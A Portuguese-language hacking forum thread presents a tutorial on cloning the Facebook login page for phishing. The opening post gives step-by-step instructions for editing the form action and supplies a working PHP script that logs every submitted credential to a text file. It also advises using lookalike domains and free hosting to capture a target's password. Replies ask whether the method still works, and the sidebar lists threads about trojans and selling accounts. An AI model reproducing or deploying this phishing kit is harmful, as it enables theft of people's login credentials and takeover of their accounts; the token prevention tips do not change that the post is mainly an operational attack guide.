CaveiraTech Fórum
collapse

Tutorial Phishing Scam


Offline MoreFuse

  • C0D3R
  • ****
    • Posts: 286
  • Liked: 151
  • Likes Given: 36
Neste tutorial vou ensinar como se praticar ou prevenir o Phishing Scam.

Pra começo de conversa vou lembrar que se você fizer phishing scam com propósitos criminosos a policia vai atrás de voce.

Primeiramente precisamos entender o que é o phishing scam, que nada mais é do que uma cópia perfeita de uma determinada webpage, com o propósito de roubar informações, tais como endereços, telefones, nome de familiares, documentos, senhas, etc. Imagine a homepage do seu serviço de email, idêntica, porém ao digitar seu login e senha as informações são redirecionadas para um servidor web de um usuário malicioso. Pode ser praticado com qualquer webpage, mesmo as mais seguras como de serviços bancários e compras com cartões de crédito. Esses “clones” são hospedados em algum serviço de hospedagem web, não recomendo nenhum em especial e todos vão ceder suas informações pra policia.

Agora vamos nos aprofundar e criar um phishing scam no nosso localhost, depois se desejar hospedar basta usar algum serviço de hospedagem gratuito.
Para rodar o site no localhost será preciso ter o LAMP/WAMP/MAMP instalado (apache + mysql + php), depois bastara colocar todos arquivos numa pasta no diretório do localhost /var/www e acessa-los digitando localhost ou 127.0.0.1 no navegador.
Primeiro vamos conhecer os arquivos que serão utilizados:

Uma página web (index.html) – É a cópia perfeita de uma página web, quando editarmos os códigos dela devemos mudar o atributo action para seu script php (“action=post.php”). O atributo action consiste numa ação a ser executada em resposta à outra, como clicar em um  botão de login por exemplo, nesse caso a ação é executar o script php.

Script php (post.php) – O pulo do gato do phishing scam, o propósito deste script é pegar os dados e redireciona-los para um arquivo de texto (usuarios.txt) através do método GET

Arquivo de texto (usuarios.txt) – para onde as informações serão direcionadas.

 

Para obter a página web primeiramente devemos acessar a página que desejamos clonar (You are not allowed to view links. Register or Login)

Dê um clique com o botão direito do mouse em um espaço vazio e escolha “view page source” e salve com o nome “index.html”.

abra o arquivo “index.html” e procure pela linha que tem action=”https://www.facebook.com/login.php?login_attempt=1? method=”post” Em seguida troque o conteúdo do action (You are not allowed to view links. Register or Login) por post.php. e troque o method por method=”get”

Ficará action=”post.php” method=”get”

agora crie os arquivos post.php e usernames.txt e deixe tudo numa pasta junto com o index.html

abra o post.php e escreva o script abaixo nele:

 

< ?php
header("Location: You are not allowed to view links. Register or Login");
$handle = fopen("usernames.txt", "a");
foreach($_GET as $variavel => $valor)
{
fwrite($handle, $variavel);
fwrite($handle, “=”);
fwrite($handle, $valor);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?> 
está pronto, para testar basta colocar a pasta no diretório do servidor local /www e acessar o localhost, depois é só olhar o conteúdo do usernames.txt e as senhas estarão lá, caso deseje usar para descobrir a senha de alguem, só falta hospedar em um site de hospedagem gratuito e fazer a pessoa tentar acessar o site pelo seu endereço, isso pode ser feito de diversas formas mais inteligentes do que simplesmente enviar o link pra pessoa, e geralmente são colocados endereços parecidos (por exemplo faceebuok, feicebook,faceb00ok etc) portanto a melhor maneira de se protejer deste tipo de ataque é verificar se o endereço da página se trata do original. Ainda assim se você por engano for vítima de um phishing scam não haverá problemas se você mudar sua senha imediatamente ou no caso de informações bancárias ligar pro banco imediatamente para cancelar sua conta.

É só isso galera Flw!


Offline User32

  • C0D3R
  • ****
    • Posts: 422
  • Invasao e a Meta do Dia
    • Increve ae
  • Liked: 95
  • Likes Given: 175
cara bem da hora vlw eu uso kali linux e bem mais faciu fazer kkkk 
O verdadeiro hacker não se autodenomina com este título, ele é denominado.


Offline ArthurOliveira

  • Elite
  • ASS4NG3
  • *
    • Posts: 8.275
  • Liked: 1612
  • Likes Given: 793
Já testei este método mais geralmente o navegador detecta que e phishing ou ate mesmo o anti-virus pega.


Offline Full9175

  • L4MM3R
  • *
    • Posts: 1
  • Liked: 0
  • Likes Given: 0
Código: You are not allowed to view links. Register or Login
boa tarde pessoal esse modelo ainda ta virando ?


Offline Godness_black

  • L4MM3R
  • *
    • Posts: 1
  • Liked: 0
  • Likes Given: 0
Código: You are not allowed to view links. Register or Login
boa tarde pessoal esse modelo ainda ta virando ?
 Eu também gostaria de saber....


 

* CaveiraTech YouTube

* Facebook

Guilherme Junqueira
04 de Fevereiro de 2019, 18:01 por Guilherme Junqueira
Views: 56106 | Comments: 24

Infelizmente a seção de Grupos de estudos do fórum estava sendo usada por organizações criminosas para recruta...
Guilherme Junqueira
27 de Julho de 2018, 17:30 por Guilherme Junqueira
Views: 40964 | Comments: 64

Pessoal, estou pensando seriamente na possibilidade de criar um novo fórum, só que voltado 100% à programação....
Guilherme Junqueira
26 de Junho de 2018, 20:25 por Guilherme Junqueira
Views: 23901 | Comments: 41

Resolvi fazer uma enquete para ver qual o posicionamento político da maioria aqui no fórum. O Alobus já fez um...
Guilherme Junqueira
20 de Junho de 2018, 12:56 por Guilherme Junqueira
Views: 25239 | Comments: 61

Últimamente o fórum vem sofrendo com muitas pessoas postando pirataria e esse não é o intuito do mesmo. A pira...
Guilherme Junqueira
20 de Fevereiro de 2018, 20:18 por Guilherme Junqueira
Views: 18575 | Comments: 4

Boa noite pessoal, venho apresentar para vocêsYou are not allowed to view links. Register or Login...

* Equipe

Guilherme Junqueira admin Guilherme Junqueira
Administrador
Luiz Viana admin Luiz Viana
Administrador
Alobus gmod Alobus
Moderador Geral

* Tópicos Recentes

movimento do fórum por AbnnerLotus
[Ontem às 22:29]


Kali Linux todas as versões disponíveis [08-04-2016] por AbnnerLotus
[Ontem às 21:06]


Procuro amadores da tecnologia para estudar juntos por gionunes
[Ontem às 18:27]


Como Fazer Dual Boot(Kali Linux) Sem Erros! por gferreira
[Ontem às 13:42]


PCSX2. Emulador de play2 por SrbLm
[15 de Janeiro de 2022, 18:19]


Precisa-se profissional avançando $$ por Lord_kannibal
[15 de Janeiro de 2022, 09:20]


Njrat/trioianos HELP por Lord_kannibal
[15 de Janeiro de 2022, 09:13]


Brazilian Russian Facebook account for sale por canan
[15 de Janeiro de 2022, 07:19]


Alguém poderia me ajudar a puxar dados de uma pessoa pelo número de telefone? por Lord_kannibal
[14 de Janeiro de 2022, 23:48]


ALGUEM Q CRIE TELAS FAKES por mk2021
[14 de Janeiro de 2022, 18:13]


como minerar cripto moedas por Lord_kannibal
[14 de Janeiro de 2022, 13:55]


RATS ANDROID - DNS -Ajuda por Lord_kannibal
[14 de Janeiro de 2022, 13:39]


Trojan por Lord_kannibal
[14 de Janeiro de 2022, 13:35]


Como descobrir informações de um golpistas por Lord_kannibal
[14 de Janeiro de 2022, 13:29]


Portas funcionando ok porem aparece off nos sites por Lord_kannibal
[14 de Janeiro de 2022, 13:25]